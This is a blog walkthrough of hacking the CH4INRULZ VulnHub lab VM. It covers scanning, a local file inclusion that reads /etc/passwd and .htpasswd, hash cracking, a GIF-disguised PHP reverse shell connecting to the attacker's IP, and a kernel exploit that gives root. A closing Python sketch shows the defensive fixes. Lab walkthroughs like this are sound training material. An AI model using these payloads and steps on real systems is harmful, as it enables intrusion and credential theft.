OSCP - Cracking CH4INRULZ_v1.0.1


This post records my penetration-testing study of CH4INRULZ_v1.0.1. The test VM comes from www.vulnhub.com. Blog series: OSCP cracking series for CTF. Download link: CH4INRULZ_v1.0.1

  1. The system uses DHCP, so its IP is unknown; netdiscover can find it

     root@kali:~# netdiscover -r 10.10.10.0/24
     Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                               
                                                                                                                                                                  
      6 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 360                                                                                             
      _____________________________________________________________________________
        IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
      -----------------------------------------------------------------------------
      10.10.10.1      00:50:56:c0:00:08      2     120  VMware, Inc.                                                                                              
      10.10.10.2      00:50:56:fb:16:b2      1      60  VMware, Inc.                                                                                              
      10.10.10.168    00:0c:29:15:19:a3      2     120  VMware, Inc.                                                                                              
      10.10.10.254    00:50:56:e8:71:43      1      60  VMware, Inc.  
  2. The IP is 10.10.10.168; next, discover the open ports

     root@kali:~# nmap -A 10.10.10.168 -p 1-65535 -T4
     Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 22:53 EST
     Nmap scan report for 10.10.10.168
     Host is up (0.00039s latency).
     Not shown: 65531 closed ports
     PORT     STATE SERVICE VERSION
     21/tcp   open  ftp     vsftpd 2.3.5
     |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
     | ftp-syst: 
     |   STAT: 
     | FTP server status:
     |      Connected to 10.10.10.166
     |      Logged in as ftp
     |      TYPE: ASCII
     |      No session bandwidth limit
     |      Session timeout in seconds is 300
     |      Control connection is plain text
     |      Data connections will be plain text
     |      At session startup, client count was 3
     |      vsFTPd 2.3.5 - secure, fast, stable
     |_End of status
     22/tcp   open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
     | ssh-hostkey: 
     |   1024 d4:f8:c1:55:92:75:93:f7:7b:65:dd:2b:94:e8:bb:47 (DSA)
     |   2048 3d:24:ea:4f:a2:2a:ca:63:b7:f4:27:0f:d9:17:03:22 (RSA)
     |_  256 e2:54:a7:c7:ef:aa:8c:15:61:20:bd:aa:72:c0:17:88 (ECDSA)
     80/tcp   open  http    Apache httpd 2.2.22 ((Ubuntu))
     |_http-server-header: Apache/2.2.22 (Ubuntu)
     |_http-title: FRANK's Website | Under development
     8011/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
     |_http-server-header: Apache/2.2.22 (Ubuntu)
     |_http-title: Site doesn't have a title (text/html).
     MAC Address: 00:0C:29:15:19:A3 (VMware)
     Device type: general purpose
     Running: Linux 2.6.X
     OS CPE: cpe:/o:linux:linux_kernel:2.6
     OS details: Linux 2.6.19 - 2.6.36
     Network Distance: 1 hop
     Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
     
     TRACEROUTE
     HOP RTT     ADDRESS
     1   0.39 ms 10.10.10.168
     
     OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
     Nmap done: 1 IP address (1 host up) scanned in 14.78 seconds

    The scan finds ports 21, 22, 80 and 8011 open. Start by checking port 21

     PS C:\Users\John> ftp 10.10.10.168
     连接到 10.10.10.168
     220 (vsFTPd 2.3.5)
     200 Always in UTF8 mode.
     用户(10.10.10.168:(none)): Anonymous
     331 Please specify the password.
     密码:
     230 Login successful.
     ftp>
     ftp> ls -la

    The FTP server holds no useful leads, and no existing exploit was found for this vsftpd version

     root@kali:~# searchsploit vsftpd
     --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
      Exploit Title                                                                                                       |  Path
                                                                                                                          | (/usr/share/exploitdb/)
     --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
     vsftpd 2.0.5 - 'CWD' (Authenticated) Remote Memory Consumption                                                       | exploits/linux/dos/5814.pl
     vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (1)                                                       | exploits/windows/dos/31818.sh
     vsftpd 2.0.5 - 'deny_file' Option Remote Denial of Service (2)                                                       | exploits/windows/dos/31819.pl
     vsftpd 2.3.2 - Denial of Service                                                                                     | exploits/linux/dos/16270.c
     vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)                                                               | exploits/unix/remote/17491.rb
     --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
     Shellcodes: No Result
     root@kali:~# 

    No version-specific vulnerability was found for OpenSSH 5.9p1 Debian 5ubuntu1.10 on port 22 either

  3. Next, test port 8011

    Brute-force directories with dirb

     root@kali:~# dirb http://10.10.10.168:8011
     
     -----------------
     DIRB v2.22    
     By The Dark Raver
     -----------------
     
     START_TIME: Mon Mar  4 23:15:57 2019
     URL_BASE: http://10.10.10.168:8011/
     WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
     
     -----------------
     
     GENERATED WORDS: 4612                                                          
     
     ---- Scanning URL: http://10.10.10.168:8011/ ----
     ==> DIRECTORY: http://10.10.10.168:8011/api/                                                                                                                 
     + http://10.10.10.168:8011/index.html (CODE:200|SIZE:30)                                                                                                     
     + http://10.10.10.168:8011/server-status (CODE:403|SIZE:295)                                                                                                 
                                                                                                                                                                  
     ---- Entering directory: http://10.10.10.168:8011/api/ ----
     + http://10.10.10.168:8011/api/index.html (CODE:200|SIZE:351)                                                                                                
                                                                                                                                                                  
     -----------------
     END_TIME: Mon Mar  4 23:16:02 2019
     DOWNLOADED: 9224 - FOUND: 3

    Run a vulnerability scan with nikto

     root@kali:~# nikto -C all -h 10.10.10.168:8011
     - Nikto v2.1.6
     ---------------------------------------------------------------------------
     + Target IP:          10.10.10.168
     + Target Hostname:    10.10.10.168
     + Target Port:        8011
     + Start Time:         2019-03-04 23:16:04 (GMT-5)
     ---------------------------------------------------------------------------
     + Server: Apache/2.2.22 (Ubuntu)
     + Server leaks inodes via ETags, header found with file /, inode: 1052109, size: 30, mtime: Sat Apr 14 08:00:08 2018
     + The anti-clickjacking X-Frame-Options header is not present.
     + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
     + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
     + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
     + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
     + OSVDB-3233: /icons/README: Apache default file found.
     + 26131 requests: 0 error(s) and 7 item(s) reported on remote host
     + End Time:           2019-03-04 23:17:16 (GMT-5) (72 seconds)
     ---------------------------------------------------------------------------
     + 1 host(s) tested

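    Visiting the results of the scans above shows that http://10.10.10.168:8011/api/index.html contains a hint

    Testing each of the four pages named in the hint shows that http://10.10.10.168:8011/api/files_api.php returns output, and that the output mentions a file parameter

    Next, test whether the file parameter can be exploited, for example by requesting "http://10.10.10.168:8011/api/files_api.php?file=/etc/passwd". The request is blocked, which suggests the parameter should be exploitable

    Now try the test from the command line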

     root@kali:~# curl -X POST -d "file=/etc/passwd" http://10.10.10.168:8011/api/files_api.php
     
     <head>
       <title>franks website | simple website browser API</title>
     </head>
     
     root:x:0:0:root:/root:/bin/bash
     bin:x:2:2:bin:/bin:/bin/sh
     sys:x:3:3:sys:/dev:/bin/sh
     sync:x:4:65534:sync:/bin:/bin/sync
     games:x:5:60:games:/usr/games:/bin/sh
     man:x:6:12:man:/var/cache/man:/bin/sh
     lp:x:7:7:lp:/var/spool/lpd:/bin/sh
     mail:x:8:8:mail:/var/mail:/bin/sh
     news:x:9:9:news:/var/spool/news:/bin/sh
     uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
     proxy:x:13:13:proxy:/bin:/bin/sh
     www-data:x:33:33:www-data:/var/www:/bin/sh
     backup:x:34:34:backup:/var/backups:/bin/sh
     list:x:38:38:Mailing List Manager:/var/list:/bin/sh
     irc:x:39:39:ircd:/var/run/ircd:/bin/sh
     gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
     nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
     libuuid:x:100:101::/var/lib/libuuid:/bin/sh
     syslog:x:101:103::/home/syslog:/bin/false
     frank:x:1000:1000:frank,,,:/home/frank:/bin/bash
     sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
     ftp:x:103:111:ftp daemon,,,:/srv/ftp:/bin/false
  4. Next, probe port 80

    First brute-force the site's directories with dirb

     root@kali:~# dirb http://10.10.10.168
     
     -----------------
     DIRB v2.22    
     By The Dark Raver
     -----------------
     
     START_TIME: Mon Mar  4 23:06:36 2019
     URL_BASE: http://10.10.10.168/
     WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
     
     -----------------
     
     GENERATED WORDS: 4612                                                          
     
     ---- Scanning URL: http://10.10.10.168/ ----
     + http://10.10.10.168/cgi-bin/ (CODE:403|SIZE:288)                                                                                                           
     ==> DIRECTORY: http://10.10.10.168/css/                                                                                                                      
     + http://10.10.10.168/development (CODE:401|SIZE:479)                                                                                                        
     ==> DIRECTORY: http://10.10.10.168/img/                                                                                                                      
     + http://10.10.10.168/index (CODE:200|SIZE:334)                                                                                                              
     + http://10.10.10.168/index.html (CODE:200|SIZE:13516)                                                                                                       
     ==> DIRECTORY: http://10.10.10.168/js/                                                                                                                       
     + http://10.10.10.168/LICENSE (CODE:200|SIZE:1093)                                                                                                           
     + http://10.10.10.168/robots (CODE:200|SIZE:21)                                                                                                              
     + http://10.10.10.168/robots.txt (CODE:200|SIZE:21)                                                                                                          
     + http://10.10.10.168/server-status (CODE:403|SIZE:293)                                                                                                      
     ==> DIRECTORY: http://10.10.10.168/vendor/                                                                                                                   
                                                                                                                                                                  
     ---- Entering directory: http://10.10.10.168/css/ ----
     (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
         (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                  
     ---- Entering directory: http://10.10.10.168/img/ ----
     (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
         (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                  
     ---- Entering directory: http://10.10.10.168/js/ ----
     (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
         (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                  
     ---- Entering directory: http://10.10.10.168/vendor/ ----
     (!) WARNING: Directory IS LISTABLE. No need to scan it.                        
         (Use mode '-w' if you want to scan it anyway)
                                                                                    
     -----------------
     END_TIME: Mon Mar  4 23:06:39 2019
     DOWNLOADED: 4612 - FOUND: 8

    This finds the cgi-bin, development, css, img, js and vendor directories. Focus on the directory that requires password authentication (the back-end page)

     root@kali:~# dirb http://10.10.10.168 | grep "CODE:401"
     + http://10.10.10.168/development (CODE:401|SIZE:479)                 

    Then scan the site with nikto

     root@kali:~# nikto -C all -h 10.10.10.168
     - Nikto v2.1.6
     ---------------------------------------------------------------------------
     + Target IP:          10.10.10.168
     + Target Hostname:    10.10.10.168
     + Target Port:        80
     + Start Time:         2019-03-04 23:08:04 (GMT-5)
     ---------------------------------------------------------------------------
     + Server: Apache/2.2.22 (Ubuntu)
     + Server leaks inodes via ETags, header found with file /, inode: 1051931, size: 13516, mtime: Sat Apr 14 09:39:32 2018
     + The anti-clickjacking X-Frame-Options header is not present.
     + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
     + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
     + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
     + Uncommon header 'tcn' found, with contents: list
     + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.html, index.html.bak
     + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
     + OSVDB-3268: /img/: Directory indexing found.
     + OSVDB-3092: /img/: This might be interesting...
     + OSVDB-3233: /icons/README: Apache default file found.
     + 26280 requests: 0 error(s) and 11 item(s) reported on remote host
     + End Time:           2019-03-04 23:09:13 (GMT-5) (69 seconds)
     ---------------------------------------------------------------------------
     + 1 host(s) tested

    This finds the img directory and the /icons/README file, and also reports two files for index: "index.html" and "index.html.bak"

    Download this file:

     root@kali:~# wget http://10.10.10.168/index.html.bak
     --2019-03-04 23:36:01--  http://10.10.10.168/index.html.bak
     Connecting to 10.10.10.168:80... connected.
     HTTP request sent, awaiting response... 200 OK
     Length: 334 [application/x-trash]
     Saving to: ‘index.html.bak’
     
     index.html.bak                          100%[=============================================================================>]     334  --.-KB/s    in 0s      
     
     2019-03-04 23:36:01 (71.7 MB/s) - ‘index.html.bak’ saved [334/334]
     
     root@kali:~# cat index.html.bak 
     <html><body><h1>It works!</h1>
     <p>This is the default web page for this server.</p>
     <p>The web server software is running but no content has been added, yet.</p>
     <a href="/development">development</a>
     <!-- I will use frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0 as the .htpasswd file to protect the development path -->
     </body></html>
     

    Its content reveals the username and password: frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

    Alternatively, run this command

     root@kali:~# curl -X POST -d "file=/etc/.htpasswd" http://10.10.10.168:8011/api/files_api.php
     
     <head>
       <title>franks website | simple website browser API</title>
     </head>
     
     frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

    Brute-force the credentials above:

    frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0

    hash-identifier can be used to determine the hash type, then John the Ripper to brute-force it

     root@kali:~# hash-identifier 
        #########################################################################
        #	 __  __ 		    __		 ______    _____	   #
        #	/\ \/\ \		   /\ \ 	/\__  _\  /\  _ `\	   #
        #	\ \ \_\ \     __      ____ \ \ \___	\/_/\ \/  \ \ \/\ \	   #
        #	 \ \  _  \  /'__`\   / ,__\ \ \  _ `\	   \ \ \   \ \ \ \ \	   #
        #	  \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \	    \_\ \__ \ \ \_\ \	   #
        #	   \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/	   #
        #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
        #								 By Zion3R #
        #							www.Blackploit.com #
        #						       Root@Blackploit.com #
        #########################################################################
     
        -------------------------------------------------------------------------
      HASH: $apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
     
     Possible Hashs:
     [+]  MD5(APR)
     
        -------------------------------------------------------------------------

    Then crack the password with john; john works by having the hash copied into a file, which it then attacks

     root@kali:~# cat hash.txt 
     frank:$apr1$1oIGDEDK$/aVFPluYt56UvslZMBDoC0
     
     root@kali:~# john hash.txt 
     Using default input encoding: UTF-8
     Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 256/256 AVX2 8x3])
     Will run 2 OpenMP threads
     Proceeding with single, rules:Wordlist
     Press 'q' or Ctrl-C to abort, almost any other key for status
     Warning: Only 22 candidates buffered for the current salt, minimum 48
     needed for performance.
     Warning: Only 33 candidates buffered for the current salt, minimum 48
     needed for performance.
     frank!!!         (frank)
     1g 0:00:00:00 DONE 1/3 (2019-03-05 00:05) 50.00g/s 9950p/s 9950c/s 9950C/s FRANK1..gfrank
     Use the "--show" option to display all of the cracked passwords reliably
     Session completed

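    We now have the credentials frank:frank!!!; use them to log in to the development directory

    The page contains the keyword uploader; try it as a path

    This suggests a file upload vulnerability. Logging in and testing uploads shows that only image formats are accepted

    Take a PHP reverse shell from Kali and try uploading it, formatted as an image by giving it a GIF98 file header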

     root@kali:~# cat reerse_php.gif 
     	GIF98
     	<?php
     	$sock=fsockopen("10.10.10.166",4444);
     	exec("/bin/sh -i <&3 >&3 2>&3");
     	?>

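    Upload succeeded:

    Even though the upload succeeded, the file cannot be used yet, so try directory brute-forcing at this point. Directory brute-forcing reveals another directory, "http://10.10.10.168/development/uploader/FRANKuploads/"

    I don't know where FRANKuploads came from; only one image was added and nothing else was changed.

    Open a listening port on Kali, then request the reverse-shell image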

     root@kali:~# nc -nvlp 4444
     retrying local 0.0.0.0:4444 : Address already in use

    In another window:

     curl -X POST -d file=/var/www/development/uploader/FRANKuploads/reerse_php.gif 10.10.10.168:8011/api/files_api.php

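    The connection is established but drops as soon as it connects, which points to a problem with the reverse webshell, so use the reverse shell that ships with Kali instead: /usr/share/webshells/php/php-reverse-shell.php

    Change the file header to GIF98, change the file extension to gif, and upload it.

  5. Reverse shell

    Use msf or nc to listen on port 4444, set the reverse shell's port to 4444, and start listening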

     root@kali:~# nc -nvlp 4444
     listening on [any] 4444 ...
     

    Request it from a new window

     root@kali:~/Desktop# curl -X POST -d file=/var/www/development/uploader/FRANKuploads/php-reverse-shell4.gif  10.10.10.168:8011/api/files_api.php

    Shell obtained

     root@kali:~# nc -nvlp 4444
     listening on [any] 4444 ...
     connect to [10.10.10.166] from (UNKNOWN) [10.10.10.168] 37548
     Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
      06:26:47 up  2:36,  0 users,  load average: 0.00, 0.01, 1.64
     USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
     uid=33(www-data) gid=33(www-data) groups=33(www-data)
     /bin/sh: can't access tty; job control turned off

    Switch to bash

     $ python -c 'import pty; pty.spawn("/bin/bash")' 
     www-data@ubuntu:/$ id
     id
     uid=33(www-data) gid=33(www-data) groups=33(www-data)
  6. Privilege escalation

    Check the kernel version

     www-data@ubuntu:/home/frank$ uname -a
     uname -a
     Linux ubuntu 2.6.35-19-generic #28-Ubuntu SMP Sun Aug 29 06:34:38 UTC 2010 x86_64 GNU/Linux
     

    Search for exploits for the kernel version

     root@kali:~# searchsploit linux 2.6.35
     --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
      Exploit Title                                                                                                       |  Path
                                                                                                                          | (/usr/share/exploitdb/)
     --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
     Linux Kernel 2.6.35 - Network Namespace Remote Denial of Service                                                     | exploits/linux/dos/36425.txt
     --------------------------------------------------------------------------------------------------------------------- ----------------------------------------
     Shellcodes: No Result

    Set up a simple HTTP server on Kali

     root@kali:/var/www/html# python -m SimpleHTTPServer 80

    Run these commands on the target

     www-data@ubuntu:/var/www$ cd /var/tmp
     cd /var/tmp
     www-data@ubuntu:/var/tmp$ wget http://10.10.10.166/15285.c     
     wget http://10.10.10.166/15285.c
     --2019-03-05 06:51:42--  http://10.10.10.166/15285.c
     Connecting to 10.10.10.166:80... connected.
     HTTP request sent, awaiting response... 200 OK
     Length: 7155 (7.0K) [text/x-csrc]
     Saving to: `15285.c'
     
     100%[======================================>] 7,155       --.-K/s   in 0s      
     
     2019-03-05 06:51:42 (68.9 MB/s) - `15285.c' saved [7155/7155]
     
     www-data@ubuntu:/var/tmp$ ls
     ls
     15285.c
     		
     www-data@ubuntu:/var/tmp$ ls
     ls
     15285.c
     www-data@ubuntu:/var/tmp$ gcc 15285.c -o 15285
     gcc 15285.c -o 15285
     www-data@ubuntu:/var/tmp$ chmod 777 15285
     chmod 777 15285
     www-data@ubuntu:/var/tmp$ ./15285
     ./15285
     [*] Linux kernel >= 2.6.30 RDS socket exploit
     [*] by Dan Rosenberg
     [*] Resolving kernel addresses...
      [+] Resolved security_ops to 0xffffffff81ce8df0
      [+] Resolved default_security_ops to 0xffffffff81a523e0
      [+] Resolved cap_ptrace_traceme to 0xffffffff8125db60
      [+] Resolved commit_creds to 0xffffffff810852b0
      [+] Resolved prepare_kernel_cred to 0xffffffff81085780
     [*] Overwriting security ops...
     [*] Overwriting function pointer...
     [*] Triggering payload...
     [*] Restoring function pointer...
     [*] Got root!
     # 
     # python -c 'import pty; pty.spawn("/bin/bash")' 
     
     root@ubuntu:/var/tmp# id
     id
     uid=0(root) gid=0(root) groups=0(root)

    That completes the box.
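
    Added example, not part of the original post: the chain in this walkthrough works because the uploader accepts a file that merely starts with a GIF98 line, and files_api.php then runs PHP from whatever path the file parameter names. The Python sketch below shows the two server-side checks that break those links, structural validation of the upload and confinement of the served path; the function names, the /srv/public base directory and the sample bytes are assumptions constructed for this example.

```python
import os
import struct

GIF_SIGNATURES = (b"GIF87a", b"GIF89a")  # the only two valid GIF headers
PHP_OPEN_TAG = b"<?php"

# Constructed samples: a minimal 1x1 GIF, and a stand-in shaped like the
# walkthrough's upload ("GIF98" line, then PHP). The PHP body is a placeholder.
MINIMAL_GIF = (
    b"GIF89a" + struct.pack("<HH", 1, 1) + b"\x80\x00\x00"  # header + screen descriptor
    + b"\x00\x00\x00\xff\xff\xff"                            # 2-entry colour table
    + b"\x2c" + struct.pack("<HHHH", 0, 0, 1, 1) + b"\x00"   # image descriptor
    + b"\x02\x02\x44\x01\x00" + b"\x3b"                      # pixel data + trailer
)
FAKE_GIF = b"GIF98\n<?php /* placeholder */ ?>\n"


def check_gif_upload(data):
    """Return the reasons an upload is rejected; an empty list means accepted."""
    reasons = []
    if data[:6] not in GIF_SIGNATURES:
        reasons.append("bad signature")
    elif len(data) < 14:
        reasons.append("truncated")
    else:
        width, height = struct.unpack("<HH", data[6:10])  # little-endian uint16 pair
        if width == 0 or height == 0:
            reasons.append("zero-sized canvas")
        if not data.endswith(b"\x3b"):
            reasons.append("missing trailer")
    # Secondary control: image bytes have no reason to contain a PHP open tag.
    if PHP_OPEN_TAG in data.lower():
        reasons.append("embedded php")
    return reasons


def resolve_served_path(base_dir, requested):
    """Confine the `file` parameter to base_dir; raise PermissionError otherwise."""
    if os.path.isabs(requested):
        raise PermissionError("absolute path")
    base = os.path.realpath(base_dir)
    # realpath collapses ../ sequences and follows symlinks before the comparison.
    candidate = os.path.realpath(os.path.join(base, requested))
    if os.path.commonpath([base, candidate]) != base:
        raise PermissionError("outside served directory")
    return candidate  # open in binary mode and send as data; never include/execute it


def is_allowed(base_dir, requested):
    """Boolean wrapper around resolve_served_path for quick checks."""
    try:
        resolve_served_path(base_dir, requested)
        return True
    except PermissionError:
        return False


if __name__ == "__main__":
    print(check_gif_upload(MINIMAL_GIF))
    print(check_gif_upload(FAKE_GIF))
    # /srv/public is an assumed base directory for the demo.
    for path in ("logo.gif", "/etc/passwd", "../../etc/.htpasswd"):
        print(path, is_allowed("/srv/public", path))
```

    Content checks on uploads are a secondary control; the decisive fixes are that the upload directory is never treated as executable and that the file API returns bytes instead of interpreting them.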
